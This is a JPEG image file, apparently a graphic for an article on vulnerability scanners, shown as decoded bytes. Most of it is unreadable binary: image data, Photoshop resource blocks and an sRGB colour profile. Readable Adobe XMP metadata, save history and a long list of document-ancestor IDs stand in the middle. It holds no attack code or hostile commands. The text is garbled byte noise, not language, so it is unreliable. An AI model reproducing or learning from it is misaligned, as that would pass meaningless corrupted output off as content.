          Øci}LÛ{†³ ’´+œõ|ÿ¯úÿ)ktÜÇd×aÜúÀ!ÝËNžïå5>CKì’×Îÿ–èÿÂoÿÏ«sêçÓÉøWÿ£wü»Gþþ}sêçÓÉøWÿ£26—é&.Ó€÷s÷ÿ§:Èø F€m:y»ÿ ›ª=KßÒÛüå§W¸çV׿k]ú/Sm¸ª¼U>Ku>‹Õz~GNËnì|¦ì$ùìß¤c½õÿ-sÔõûº[‰õ²—Î;MUuºêu´_Y®¿Òm¶ádÙ·õŠmýì¯Õõ=%ÓÛ[žA¢ƒk¸
          Ói3ü©nÔAGPz<áúéõyímÝ_1¦hÆÄ¥Ík\á·}™6VÌ|Zýߥ¹f}Të732η–1¾±u,“^]V±Ím~—è±1i¾¦ÐÖ;ôvYoé¿áoéXAÀxÂóß®¿UZδί•i+>Æ3¨>dÒí­¡ŽÜáíÆÈÙU~£¿£?þù¹!íэUïKOÑQâ‘lø¾‰é¿÷ÿ脃,ã~ŸÌcfæt½˜¶d9øºWuÐç4ðÜ\› 9Û¿í6K¿þbïÓú_iÔ¯ªÚàXâÚ÷ˆmÀn
          ${^æîc®«{Ñïå£?Ýro¡ï®ÍÎ¥ýïø›?ê
          ã:‡ÑÅÿÃxÿõK±ÍméÏm¯XÚð6‡83Üýží›¿uqÝGèâÿáÌúµs—ùK^[÷wôÅ2w}#ñLŠÅ$’I)ÿÒì–?_Ê{V00ÂßQÿÊ2ZÉþ¦Õ°‘õ_©2‹ï¶æXþ´w¾=ÌÑVøã–ñ>´ຜ,JñhkY«Þ¬yåÆ?ê>Äcõ¤G¯“¯òÙÿ¤U̼
          °é«ÓsœWï‚`7Ghû‰±•Jˆ/)×óNUǹ¬Šæm'o62¿uë~n)qÇ¥µ—Àw¾f>Ó­ß¼¶:—FÄêO®ËÝeo¨‡VF­'v×5íç*óG§§ÈûëÿÒiÀƨ¨?óó«þë~öÿé¿ççWýÖýíÿÒ(ßóG§§ÈûëÿÒi͝þŸ#ï¯ÿI¡Xÿt}е±~ºu¬¬š±«ô˜ûœ×Úö±€Ÿß£þ¿AhUÕþ´Ú^öx©‚Ë
          Žu[k/¾ƒmŒ¿»+mc¹ïÞÏ ³ßõo«2èȼ]]–׸Tæîc὏©Ì{W+gÖ.³‘éÙ~Kí,pµ¡çsCçÔÝé;ôOÚÿ¡]Œô«ÿè#ö.ˆ'gµ¯ë[¶·ß^Nñ«©¹½{š*{-½¯sY„ë[¶¬w¹õ½›þ‚¥Ô¾²uæ?¦õ*j»Óp¦á2Ͷ†oöºš··Ò·ü+5oÖ~¹uÇ·$¾‹ÚúËZmÍµžÖlÛcö3üøMkôLýa§'¨uí9>¿¦ç3`Üuß¹Ž÷~gµ¯%Þ¨z»:Xo¯ãÑ/ý>€×ŠçûFßQÝ7%ßKs)ý&þsôÎÓúM:)ôim;Ý`d€çêâ&FãùÛygãýZÅÆvê2²Ii#ôdÓ½š:¯Írӓ0t?ø*ÆBñ¼¿­ûÒýÞ&ÿ-ž9	,ºGú¿Õýî—Zë]S†vƒÒtINÇ;eŒüýËõ‡æß‹A¥µ´ÐýÁÅßEãH-oï.žú*È¢Ê.nêíik‡‘ÿ¿5gc}Wéô]MæËžêËmkæAƒì±ÁŒký?Q¿ÛVyLàÀé(ÿ΋[›ÃÁ.1òÈÿ‹'eßHüS$’™¨¤’I%?ÿÓìÚǼ–±¥ç˜h’¶±­
          Ç­®kÚÐ,w Gî¬þ–æ·%ÅÄ4l:;µiœ¬``ÚÀG#pþõ.Cf©l{¯ë3Áßæ;ÿ"©õ-×VÆÔǸ‡I†;ˆ#¸óVþ׋þš¿ó‡÷¥ö¼_ôÕÿœ?½0X7E%Åû6OúÿšRû6OúÿšV×ÚñÓWþpþô¾×‹þš¿ó‡÷©=É~ê8GwìÙ?è_þiU:…ù˜~˜¯§ef$ŸEš4ún#ó§Úº_µâÿ¦¯üáýé}¯ý5çïKܗwx¼Ž£ÔîǺ‘Ðóšm­õ‡Èíu{¾æî\“~«õÐÐ>œ æ^½‡íx¿é«ÿ8z_kÅÿM_ùÃûÒ÷Oî~k­‹ãÿóc®ÿÜŸûeëwêû:·GÄ·Α™y¶ßT9Œ-le{aàþâô?µâÿ¦¯üáýé}¯ý5çïKÝ?¹ù¨›KËàåæåÞi³¥åâ
          ¥ÂË[,$~d€6»÷U㍐D^GõJÚû^/újÿÎޗÚñÓWþpþôŽCû«hwy~£™WK¯~Cíx>†3´ÞáùÖÍÇ®}ÿ¿üÚäÝÔ³Æyê>±v[¹ä{\ßô.¯þãÿÁèÏzØúó‹”þ¤ÌÚ/g°VÝ퇁³vìg£õ7zµþÿé?bŸ(F<Qˆ7ýêùdœèJF\:{N“Ô+êÔ1Ø}Zà_@÷9„ýëÔý¿¢³þþ¯}›'ýÿÍ+Îñs²ú~[30¬ô²+àò×4ý*­gøJŸùìÿўõé]ë>YÄ6nn>MP21Þá,'óÚã·Ô¡ÿàíÿÑ¿£LÉÅ@°³„!û6OúÿšT_]Œ€ö9“Æá·V10.dŸåïYýYíu•mpt5ÜîÔÈ̓DRÑÿÔî1¿œ?Õþ!BïçŸñþçT•ŸÒYÑúD´_<$œ‡è}Ñ|ð’J~‡Ñ-Ï	$§è}Ñ|ð’J~‡Ñ-Ï	$§è}Ñ|ð’J~„¿Ðô,ûNß³í>¶ÿ£·ù_ëýEÃdú>«þÏ¿ÐÜ}/SéíüÝð¼Ñ%&>©‹èRéß´hÓû.~Û'ÓýÝ¿á}yöý›oóûÿó禼õ$e³#ôES¾½ÛwKwm³ùÛ7{¶nú‘²þ“>ò¯œRPu}ÿÙÿí.Photoshop 3.08BIMïZ%GZ%GZ%GZ%GZ%GZ%GZ%GZ%GZ%GZ%GZ%GZ%GZ%GZ%GZ%GZ%GZ%GZ%GZ%GZ%GZ%GZ%GZ%GZ%GZ%GZ%GZ%GZ%GZ%GZ%GZ%GZ%GZ%GZ%GZ%GZ%GZ%GZ%GZ%GZ%GZ%GZ%GZ%GZ%GZ%GZ%GZ%GZ%GZ%GZ%GZ%GZ%GZ%GZ%GZ%GZ%GZ%GZ%GZ%GZ%GZ%GZ%GZ%GZ%GZ%GZ%GZ%GZ%GZ%GZ%GZ%GZ%GZ%GZ%GZ%GZ%GZ%GZ%GZ%GZ%GZ%GZ%GZ%GZ%GZ%GZ%GZ%GZ%GZ%GZ%GZ%GZ%GZ%G+R8BIM%jäÞ캐Lµj`,ë–E¯8BIM:åprintOutputPstSboolInteenumInteClrmprintSixteenBitboolprinterNameTEXTprintProofSetupObjcProof Setup
          proofSetupBltnenumbuiltinProof	proofCMYK8BIM;-printOutputOptionsCptnboolClbrboolRgsMboolCrnCboolCntCboolLblsboolNgtvboolEmlDboolIntrboolBckgObjcRGBCRd  doub@oàGrn doub@oàBl  doub@oàBrdTUntF#RltBld UntF#RltRsltUntF#Pxl@R
          vectorDataboolPgPsenumPgPsPgPCLeftUntF#RltTop UntF#RltScl UntF#Prc@YcropWhenPrintingboolcropRectBottomlongcropRectLeftlong
          cropRectRightlongcropRectToplong8BIMíHH8BIM&?€8BIMò
          ÿÿÿÿÿÿ8BIM
          8BIM8BIMó	8BIM'
          8BIMõH/fflff/ff¡™š2Z5-8BIMøpÿÿÿÿÿÿÿÿÿÿÿÿÿÿÿÿÿÿÿÿÿÿèÿÿÿÿÿÿÿÿÿÿÿÿÿÿÿÿÿÿÿÿÿÿèÿÿÿÿÿÿÿÿÿÿÿÿÿÿÿÿÿÿÿÿÿÿèÿÿÿÿÿÿÿÿÿÿÿÿÿÿÿÿÿÿÿÿÿÿè8BIM8BIM
          8BIM08BIM-)í8BIM@@8BIM8BIM}v°$19-top_5_vulnerability_scanners copy°vnullboundsObjcRct1Top longLeftlongBtomlongvRghtlong°slicesVlLsObjcslicesliceIDlonggroupIDlongoriginenumESliceOrigin
          autoGeneratedTypeenum
          ESliceTypeImg boundsObjcRct1Top longLeftlongBtomlongvRghtlong°urlTEXTnullTEXTMsgeTEXTaltTagTEXTcellTextIsHTMLboolcellTextTEXT	horzAlignenumESliceHorzAligndefault	vertAlignenumESliceVertAligndefaultbgColorTypeenumESliceBGColorTypeNone	topOutsetlong
          leftOutsetlongbottomOutsetlongrightOutsetlong8BIM(?ð8BIM)î8BIMÈ Tà€¬ÿØÿíAdobe_CMÿîAdobed€ÿۄ			
          
          
          
          ÿÀT "ÿÝ
          ÿÄ?	
          	
          3!1AQa"q2‘¡±B#$RÁb34r‚ÑC%’Sðáñcs5¢²ƒ&D“TdE£t6ÒUâeò³„ÃÓuãóF'”¤…´•ÄÔäô¥µÅÕåõVfv†–¦¶ÆÖæö7GWgw‡—§·Ç×ç÷5!1AQaq"2‘¡±B#ÁRÑð3$bár‚’CScs4ñ%¢²ƒ&5ÂÒD“T£dEU6teâò³„ÃÓuãóF”¤…´•ÄÔäô¥µÅÕåõVfv†–¦¶ÆÖæö'7GWgw‡—§·ÇÿÚ?ì’I%iI$’JrúŸ«n}8Âëi¯Ðu¤T털?gº?’šž•‘yp«/$í‚fèç⥛ÿ,Sÿ…_ÿŸÏÕвtÃ"ë‰ò—,tµ 9°sî^GþÄ%û7þåäìBëX^kcŸK[a½€‚{´>¿üÕ0ZI`ZÞ%Ø.áxÿØ9¿÷/#ÿbýƒ›ÿrò?ö!uö0°L×5Ó‰§Ç䏿.ÁTGöoýËÈÿ؄¿`æÿܼýˆ]U
          º–Ü(umx¶´±ãX÷±Íö©úŒýÆÿ¯ÉžDXF4H:£É~ÁÍÿ¹yû—ìßû—‘ÿ±­W݀| ¤û+{«¬>À	c
          Æ=­Ý®ÝÈûòì¡y'ô,Úë6»+#cD’/¨ö]‹f=µåd<›ë¬¶ËšZ÷mxsWaœp^ç1µ8Ña¶½aöïÌzä³~Ž7þ£þ©IŠfbÊ$+GdòRNy?É«T’I$§ÿÐì’I%iI!Úm5F°‰EF”åæÿË4áGÿçÅ·õséäü+ÿы7þZ£ÿ
          ?ÿ>-¿«ŸO'á_þŒK'óGËþét]+…€ã½Ûš,ö€ÂG¨æí­ÞýŸAX-
          lëÒ~à?+”ÏÑUNëïJ¤9ùx¸8wçe¸2ŒjÝe"a­ŒÎwòW5‹ÒúÏÖJۛÖrïé˜Wø½#â—úF6ÙÔ2X=k-µ§ßŽÏM”Æo­\úðÖ¿¢×]ÀK3pٙ<z'"ŸSwò~Š?ւöt÷ÙìnÐ,’-ÎÖÔG溯ç=ßÍïHςC}æ¯ÃÝÉw\DFüܱõB†ÐÜÏ«_+
          çɤ›Ý‘c„ûo£ Ûê}Å«¿W:æOR¯#¨TÜ^¯Ó^)ÏÇÛ.©É ïÕòYï¯ÿ8U>©>ÛZßMþ™ihy2ƺ}cŽÝvîý«ÿ[S›ÆE» 5ݮɎÆFÚ7ÿÂzôÐä2Þ®ü—óx§6çºØ™nélîm‘ê}ý-ŸAŽhåÄ ýõ8Ø9ºx€¤+Q·üЎŒ:‰âFßú’¸Üÿ†èÿª]P…pÿ·ËóJã³þŽ/þ£þ©OËì|֗mßHüS'wÒ?È­RI$’ŸÿÑì“=í­…ï0Öò,‹t˜…Óà[î
          Øci}LÛ{†³ ’´+œõ|ÿ¯úÿ)ktÜÇd×aÜúÀ!ÝËNžïå5>CKì’×Îÿ–èÿÂoÿÏ«sêçÓÉøWÿ£wü»Gþþ}sêçÓÉøWÿ£26—é&.Ó€÷s÷ÿ§:Èø F€m:y»ÿ ›ª=KßÒÛüå§W¸çV׿k]ú/Sm¸ª¼U>Ku>‹Õz~GNËnì|¦ì$ùìß¤c½õÿ-sÔõûº[‰õ²—Î;MUuºêu´_Y®¿Òm¶ádÙ·õŠmýì¯Õõ=%ÓÛ[žA¢ƒk¸
          Ói3ü©nÔAGPz<áúéõyímÝ_1¦hÆÄ¥Ík\á·}™6VÌ|Zýߥ¹f}Të732η–1¾±u,“^]V±Ím~—è±1i¾¦ÐÖ;ôvYoé¿áoéXAÀxÂóß®¿UZδί•i+>Æ3¨>dÒí­¡ŽÜáíÆÈÙU~£¿£?þù¹!íэUïKOÑQâ‘lø¾‰é¿÷ÿ脃,ã~ŸÌcfæt½˜¶d9øºWuÐç4ðÜ\› 9Û¿í6K¿þbïÓú_iÔ¯ªÚàXâÚ÷ˆmÀn
          ${^æîc®«{Ñïå£?Ýro¡ï®ÍÎ¥ýïø›?ê
          ã:‡ÑÅÿÃxÿõK±ÍméÏm¯XÚð6‡83Üýží›¿uqÝGèâÿáÌúµs—ùK^[÷wôÅ2w}#ñLŠÅ$’I)ÿÒì–?_Ê{V00ÂßQÿÊ2ZÉþ¦Õ°‘õ_©2‹ï¶æXþ´w¾=ÌÑVøã–ñ>´ຜ,JñhkY«Þ¬yåÆ?ê>Äcõ¤G¯“¯òÙÿ¤U̼
          °é«ÓsœWï‚`7Ghû‰±•Jˆ/)×óNUǹ¬Šæm'o62¿uë~n)qÇ¥µ—Àw¾f>Ó­ß¼¶:—FÄêO®ËÝeo¨‡VF­'v×5íç*óG§§ÈûëÿÒiÀƨ¨?óó«þë~öÿé¿ççWýÖýíÿÒ(ßóG§§ÈûëÿÒi͝þŸ#ï¯ÿI¡Xÿt}е±~ºu¬¬š±«ô˜ûœ×Úö±€Ÿß£þ¿AhUÕþ´Ú^öx©‚Ë
          Žu[k/¾ƒmŒ¿»+mc¹ïÞÏ ³ßõo«2èȼ]]–׸Tæîc὏©Ì{W+gÖ.³‘éÙ~Kí,pµ¡çsCçÔÝé;ôOÚÿ¡]Œô«ÿè#ö.ˆ'gµ¯ë[¶·ß^Nñ«©¹½{š*{-½¯sY„ë[¶¬w¹õ½›þ‚¥Ô¾²uæ?¦õ*j»Óp¦á2Ͷ†oöºš··Ò·ü+5oÖ~¹uÇ·$¾‹ÚúËZmÍµžÖlÛcö3üøMkôLýa§'¨uí9>¿¦ç3`Üuß¹Ž÷~gµ¯%Þ¨z»:Xo¯ãÑ/ý>€×ŠçûFßQÝ7%ßKs)ý&þsôÎÓúM:)ôim;Ý`d€çêâ&FãùÛygãýZÅÆvê2²Ii#ôdÓ½š:¯Írӓ0t?ø*ÆBñ¼¿­ûÒýÞ&ÿ-ž9	,ºGú¿Õýî—Zë]S†vƒÒtINÇ;eŒüýËõ‡æß‹A¥µ´ÐýÁÅßEãH-oï.žú*È¢Ê.nêíik‡‘ÿ¿5gc}Wéô]MæËžêËmkæAƒì±ÁŒký?Q¿ÛVyLàÀé(ÿ΋[›ÃÁ.1òÈÿ‹'eßHüS$’™¨¤’I%?ÿÓìÚǼ–±¥ç˜h’¶±­
          Ç­®kÚÐ,w Gî¬þ–æ·%ÅÄ4l:;µiœ¬``ÚÀG#pþõ.Cf©l{¯ë3Áßæ;ÿ"©õ-×VÆÔǸ‡I†;ˆ#¸óVþ׋þš¿ó‡÷¥ö¼_ôÕÿœ?½0X7E%Åû6OúÿšRû6OúÿšV×ÚñÓWþpþô¾×‹þš¿ó‡÷©=É~ê8GwìÙ?è_þiU:…ù˜~˜¯§ef$ŸEš4ún#ó§Úº_µâÿ¦¯üáýé}¯ý5çïKܗwx¼Ž£ÔîǺ‘Ðóšm­õ‡Èíu{¾æî\“~«õÐÐ>œ æ^½‡íx¿é«ÿ8z_kÅÿM_ùÃûÒ÷Oî~k­‹ãÿóc®ÿÜŸûeëwêû:·GÄ·Α™y¶ßT9Œ-le{aàþâô?µâÿ¦¯üáýé}¯ý5çïKÝ?¹ù¨›KËàåæåÞi³¥åâ
          ¥ÂË[,$~d€6»÷U㍐D^GõJÚû^/újÿÎޗÚñÓWþpþôŽCû«hwy~£™WK¯~Cíx>†3´ÞáùÖÍÇ®}ÿ¿üÚäÝÔ³Æyê>±v[¹ä{\ßô.¯þãÿÁèÏzØúó‹”þ¤ÌÚ/g°VÝ퇁³vìg£õ7zµþÿé?bŸ(F<Qˆ7ýêùdœèJF\:{N“Ô+êÔ1Ø}Zà_@÷9„ýëÔý¿¢³þþ¯}›'ýÿÍ+Îñs²ú~[30¬ô²+àò×4ý*­gøJŸùìÿўõé]ë>YÄ6nn>MP21Þá,'óÚã·Ô¡ÿàíÿÑ¿£LÉÅ@°³„!û6OúÿšT_]Œ€ö9“Æá·V10.dŸåïYýYíu•mpt5ÜîÔÈ̓DRÑÿÔî1¿œ?Õþ!BïçŸñþçT•ŸÒYÑúD´_<$œ‡è}Ñ|ð’J~‡Ñ-Ï	$§è}Ñ|ð’J~‡Ñ-Ï	$§è}Ñ|ð’J~„¿Ðô,ûNß³í>¶ÿ£·ù_ëýEÃdú>«þÏ¿ÐÜ}/SéíüÝð¼Ñ%&>©‹èRéß´hÓû.~Û'ÓýÝ¿á}yöý›oóûÿó禼õ$e³#ôES¾½ÛwKwm³ùÛ7{¶nú‘²þ“>ò¯œRPu}ÿÙ8BIM!WAdobe PhotoshopAdobe Photoshop 20208BIMÿá+Yhttp://ns.adobe.com/xap/1.0/<?xpacket begin="" id="W5M0MpCehiHzreSzNTczkc9d"?> <x:xmpmeta xmlns:x="adobe:ns:meta/" x:xmptk="Adobe XMP Core 5.6-c148 79.164036, 2019/08/13-01:06:57        "> <rdf:RDF xmlns:rdf="http://www.w3.org/1999/02/22-rdf-syntax-ns#"> <rdf:Description rdf:about="" xmlns:xmp="http://ns.adobe.com/xap/1.0/" xmlns:dc="http://purl.org/dc/elements/1.1/" xmlns:xmpMM="http://ns.adobe.com/xap/1.0/mm/" xmlns:stEvt="http://ns.adobe.com/xap/1.0/sType/ResourceEvent#" xmlns:stRef="http://ns.adobe.com/xap/1.0/sType/ResourceRef#" xmlns:photoshop="http://ns.adobe.com/photoshop/1.0/" xmp:CreatorTool="Adobe Photoshop CC 2019 (Macintosh)" xmp:CreateDate="2015-08-12T08:40:52-06:00" xmp:MetadataDate="2019-12-03T13:35:22-07:00" xmp:ModifyDate="2019-12-03T13:35:22-07:00" dc:format="image/jpeg" xmpMM:InstanceID="xmp.iid:693fca51-7f0d-4c7d-ad46-3be3b13f7170" xmpMM:DocumentID="adobe:docid:photoshop:90dc98be-e3c9-bd43-aa6c-4c8d5ec2c480" xmpMM:OriginalDocumentID="xmp.did:2dd2cb17-05f1-a641-a3c6-86b1aaedfa00" photoshop:ColorMode="3" photoshop:ICCProfile="sRGB IEC61966-2.1"> <xmpMM:History> <rdf:Seq> <rdf:li stEvt:action="created" stEvt:instanceID="xmp.iid:2dd2cb17-05f1-a641-a3c6-86b1aaedfa00" stEvt:when="2015-08-12T08:40:52-06:00" stEvt:softwareAgent="Adobe Photoshop CC 2015 (Windows)"/> <rdf:li stEvt:action="saved" stEvt:instanceID="xmp.iid:c59fedb7-5aae-dc44-806c-a9ae14d83653" stEvt:when="2015-08-12T10:34:52-06:00" stEvt:softwareAgent="Adobe Photoshop CC 2015 (Windows)" stEvt:changed="/"/> <rdf:li stEvt:action="saved" stEvt:instanceID="xmp.iid:70aec4d0-117c-4e82-a61d-a7745e5349a0" stEvt:when="2019-12-03T13:35:22-07:00" stEvt:softwareAgent="Adobe Photoshop 21.0 (Macintosh)" stEvt:changed="/"/> <rdf:li stEvt:action="converted" stEvt:parameters="from application/vnd.adobe.photoshop to image/jpeg"/> <rdf:li stEvt:action="derived" stEvt:parameters="converted from application/vnd.adobe.photoshop to image/jpeg"/> <rdf:li stEvt:action="saved" stEvt:instanceID="xmp.iid:693fca51-7f0d-4c7d-ad46-3be3b13f7170" stEvt:when="2019-12-03T13:35:22-07:00" stEvt:softwareAgent="Adobe Photoshop 21.0 (Macintosh)" stEvt:changed="/"/> </rdf:Seq> </xmpMM:History> <xmpMM:DerivedFrom stRef:instanceID="xmp.iid:70aec4d0-117c-4e82-a61d-a7745e5349a0" stRef:documentID="adobe:docid:photoshop:7dbf3126-d713-a744-8bcc-86ce4a28f7ad" stRef:originalDocumentID="xmp.did:2dd2cb17-05f1-a641-a3c6-86b1aaedfa00"/> <photoshop:DocumentAncestors> <rdf:Bag> <rdf:li>130277488</rdf:li> <rdf:li>141194698</rdf:li> <rdf:li>145150258</rdf:li> <rdf:li>167191953</rdf:li> <rdf:li>176341593</rdf:li> <rdf:li>178977234</rdf:li> <rdf:li>182272822</rdf:li> <rdf:li>192261204</rdf:li> <rdf:li>193438474</rdf:li> <rdf:li>195689250</rdf:li> <rdf:li>196294602</rdf:li> <rdf:li>228083377</rdf:li> <rdf:li>242265558</rdf:li> <rdf:li>3C195ED08DD181C1E70D74058088D923</rdf:li> <rdf:li>51124270</rdf:li> <rdf:li>55EBD6896B155197C00F14AE15DD5833</rdf:li> <rdf:li>6A0A15811A8FC9AC3A16B564BD642F8C</rdf:li> <rdf:li>73579908</rdf:li> <rdf:li>786951C7142A2AEC38D5A5004E40A752</rdf:li> <rdf:li>85C0BB87BEAE9829B22F9F7DDC288118</rdf:li> <rdf:li>98849039</rdf:li> <rdf:li>A5AC77993D83A50F34AA7C4E8A6D5DC7</rdf:li> <rdf:li>F33669D08BFCBD95F06E1D6DC8085223</rdf:li> <rdf:li>adobe:docid:photoshop:2aadf570-db10-11e5-8cd7-df40e3f5c0ff</rdf:li> <rdf:li>adobe:docid:photoshop:3ad2bde0-36da-11e5-aba8-c6c7ea128f87</rdf:li> <rdf:li>adobe:docid:photoshop:3ae55549-2f11-11e5-8a1e-cca3aa3b1f5b</rdf:li> <rdf:li>adobe:docid:photoshop:46ec2593-3be2-11e5-a44f-893b6bacb806</rdf:li> <rdf:li>adobe:docid:photoshop:59185ead-ccc4-1179-9470-fe1407c09860</rdf:li> <rdf:li>adobe:docid:photoshop:5d4ca717-565e-11e5-83d9-96afab01fb7d</rdf:li> <rdf:li>adobe:docid:photoshop:7e1015e9-5bcf-11e5-82d7-b1b6eadfc164</rdf:li> <rdf:li>adobe:docid:photoshop:7f36621b-addc-11e7-aea5-b4dbe1565c8e</rdf:li> <rdf:li>adobe:docid:photoshop:9510e559-2cae-11e5-a749-d8deb76636bb</rdf:li> <rdf:li>adobe:docid:photoshop:99221731-5be2-294d-9926-ec33347c3f79</rdf:li> <rdf:li>adobe:docid:photoshop:a1d8d42c-8aec-117a-9ce0-d85f44e8821b</rdf:li> <rdf:li>adobe:docid:photoshop:d04f7fa4-5c13-11e5-82d7-b1b6eadfc164</rdf:li> <rdf:li>adobe:docid:photoshop:df2f204d-b651-11e5-bb8e-99bbec9e1c45</rdf:li> <rdf:li>adobe:docid:photoshop:f188381e-5d62-11e5-a1c8-dc3a58737c37</rdf:li> <rdf:li>uuid:2CDD2D0EC944DF11BBB8F27D9F6841CA</rdf:li> <rdf:li>uuid:D670922B660CE611ADAB93AF422C66D6</rdf:li> <rdf:li>xmp.did:0093BA7511206811B1DAAEADD64F896A</rdf:li> <rdf:li>xmp.did:018011740720681180E5B75AA0F739E5</rdf:li> <rdf:li>xmp.did:0180117407206811871F80FDF2C3718E</rdf:li> <rdf:li>xmp.did:0180117407206811871FB6C01BE9F510</rdf:li> <rdf:li>xmp.did:0180117407206811871FBEC38D9105D7</rdf:li> <rdf:li>xmp.did:0180117407206811871FCD752812035C</rdf:li> <rdf:li>xmp.did:0180117407206811871FF2AB4335B888</rdf:li> <rdf:li>xmp.did:018011740720681188C683EA16CE491B</rdf:li> <rdf:li>xmp.did:018011740720681188C68D0E9FB08CA5</rdf:li> <rdf:li>xmp.did:018011740720681188C6C87AF92C64EF</rdf:li> <rdf:li>xmp.did:018011740720681192B0CDEAE74D693B</rdf:li> <rdf:li>xmp.did:028011740720681188C6AF0A6F7FE824</rdf:li> <rdf:li>xmp.did:028011740720681188C6C6A97910AC78</rdf:li> <rdf:li>xmp.did:0380117407206811871FB2718E5E8603</rdf:li> <rdf:li>xmp.did:03801174072068119109CACE15827097</rdf:li> <rdf:li>xmp.did:038011740720681192B0B2B684AE331D</rdf:li> <rdf:li>xmp.did:0480117407206811822AFC40E69A57D6</rdf:li> <rdf:li>xmp.did:04801174072068118C148D3FFC44F7CF</rdf:li> <rdf:li>xmp.did:0580117407206811871FF2DFC48F728E</rdf:li> <rdf:li>xmp.did:05801174072068118A6DDFE128CA40E1</rdf:li> <rdf:li>xmp.did:05801174072068118A6DF5A37A7EB4B7</rdf:li> <rdf:li>xmp.did:0680117407206811871FC7F631C08A65</rdf:li> <rdf:li>xmp.did:0680117407206811871FD9ADEBC05AC9</rdf:li> <rdf:li>xmp.did:0680117407206811BAA9C90DDE484AC6</rdf:li> <rdf:li>xmp.did:078011740720681192B0B2B684AE331D</rdf:li> <rdf:li>xmp.did:08801174072068118C14A81E3999D0D0</rdf:li> <rdf:li>xmp.did:0881930D1920681188C6B23E0DA3D9CA</rdf:li> <rdf:li>xmp.did:098011740720681188C6A094D1E6A3F9</rdf:li> <rdf:li>xmp.did:0A80117407206811871FC7F631C08A65</rdf:li> <rdf:li>xmp.did:0A80117407206811871FD969D92FB0E5</rdf:li> <rdf:li>xmp.did:0A8011740720681188C6D7A592EC9D69</rdf:li> <rdf:li>xmp.did:0A8011740720681192B0EAE56F792B85</rdf:li> <rdf:li>xmp.did:0e6875b8-543f-734c-9035-4a17948bcd0b</rdf:li> <rdf:li>xmp.did:131A06DA1020681188C69193806B1932</rdf:li> <rdf:li>xmp.did:175F8B652C206811871F9C3F3A8A1C0E</rdf:li> <rdf:li>xmp.did:19935B1B1220681197A5BE68DAE7D805</rdf:li> <rdf:li>xmp.did:1F4D49570D206811871FD1AC750C6933</rdf:li> <rdf:li>xmp.did:1F8418E30B20681188C6C166A936D6B2</rdf:li> <rdf:li>xmp.did:2218759B2920681192B0B98D384CD452</rdf:li> <rdf:li>xmp.did:22E7387B1020681188C6D82FD9EEA035</rdf:li> <rdf:li>xmp.did:2dd2cb17-05f1-a641-a3c6-86b1aaedfa00</rdf:li> <rdf:li>xmp.did:39EDD137112068118A6DD596BA142545</rdf:li> <rdf:li>xmp.did:420BC2ED4A206811871FB39F81FAECA2</rdf:li> <rdf:li>xmp.did:456DCAAC0A20681188C6A9BCC052530E</rdf:li> <rdf:li>xmp.did:4A6880BA172068118A6DE215332FC54A</rdf:li> <rdf:li>xmp.did:4EC83EA60C206811871FF2AB4335B888</rdf:li> <rdf:li>xmp.did:5A53435130206811871FCD752812035C</rdf:li> <rdf:li>xmp.did:6b6c8a71-1c2a-4226-8a5b-05c8742922ca</rdf:li> <rdf:li>xmp.did:706982fc-7d98-40e8-af5c-34d725b5fae1</rdf:li> <rdf:li>xmp.did:707FC7D22F206811871FC47841645D57</rdf:li> <rdf:li>xmp.did:748206EDA31DE9119725FED0EB7940B5</rdf:li> <rdf:li>xmp.did:76D4B8C310206811943DE82709197D15</rdf:li> <rdf:li>xmp.did:7911307E13206811871FC6751E16770B</rdf:li> <rdf:li>xmp.did:7D1099985A206811871F8776FCDA7166</rdf:li> <rdf:li>xmp.did:7DB3BE00292068118A6D84548B7B40A0</rdf:li> <rdf:li>xmp.did:81A7D5F82A206811871FC47841645D57</rdf:li> <rdf:li>xmp.did:859F05911120681188C6C1527B0156A2</rdf:li> <rdf:li>xmp.did:863A0FC29F3AE811BD0DBED084B8F5A4</rdf:li> <rdf:li>xmp.did:867D40201F20681192B0BD9018AEE708</rdf:li> <rdf:li>xmp.did:8685A3F7322068119109C2E60CCDE007</rdf:li> <rdf:li>xmp.did:885D621F1720681188C6F428C73A5134</rdf:li> <rdf:li>xmp.did:9751854B10206811871FFB0658B2D2AF</rdf:li> <rdf:li>xmp.did:C1DE8EBF0F2068118A6DA044F0577970</rdf:li> <rdf:li>xmp.did:C4DE8EBF0F2068118A6DA044F0577970</rdf:li> <rdf:li>xmp.did:CDEFD3061220681192B0F75C6E6D61CB</rdf:li> <rdf:li>xmp.did:CF33DBC20D20681188C6F5FBAB6EEDBA</rdf:li> <rdf:li>xmp.did:D4B0CF55162068118C14B2857F8C4C6C</rdf:li> <rdf:li>xmp.did:E25EBE490A2068118C14EFCE47AE8D3F</rdf:li> <rdf:li>xmp.did:E71424F945206811A7BADFC90BDD9E59</rdf:li> <rdf:li>xmp.did:EA2E99433520681188C6819A55480162</rdf:li> <rdf:li>xmp.did:ECE9CB841020681192B0AC59354E4128</rdf:li> <rdf:li>xmp.did:F409F9F123206811871FCD752812035C</rdf:li> <rdf:li>xmp.did:F4F6D7D84C20681188C6F428C73A5134</rdf:li> <rdf:li>xmp.did:F77F11740720681197CFB2669E13D7A6</rdf:li> <rdf:li>xmp.did:F866F6662B20681188C6CF690D9A65F5</rdf:li> <rdf:li>xmp.did:F8D31357D8A111E492B4A31594B6DD98</rdf:li> <rdf:li>xmp.did:FE7F11740720681188C6A9BCC052530E</rdf:li> <rdf:li>xmp.did:da422971-04e3-d046-ad90-462cb7d1b2d0</rdf:li> </rdf:Bag> </photoshop:DocumentAncestors> </rdf:Description> </rdf:RDF> </x:xmpmeta>                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                 <?xpacket end="w"?>ÿâXICC_PROFILEHLinomntrRGB XYZ Î	1acspMSFTIEC sRGBöÖÓ-HP  cprtP3desc„lwtptðbkptrXYZgXYZ,bXYZ@dmndTpdmddĈvuedL†viewÔ$lumiømeas$tech0rTRC<gTRC<bTRC<textCopyright (c) 1998 Hewlett-Packard CompanydescsRGB IEC61966-2.1sRGB IEC61966-2.1XYZ óQÌXYZ XYZ o¢8õXYZ b™·…ÚXYZ $ „¶ÏdescIEC http://www.iec.chIEC http://www.iec.chdesc.IEC 61966-2.1 Default RGB colour space - sRGB.IEC 61966-2.1 Default RGB colour space - sRGBdesc,Reference Viewing Condition in IEC61966-2.1,Reference Viewing Condition in IEC61966-2.1view¤þ_.ÏíÌ\žXYZ L	VPWçmeassig CRT curv
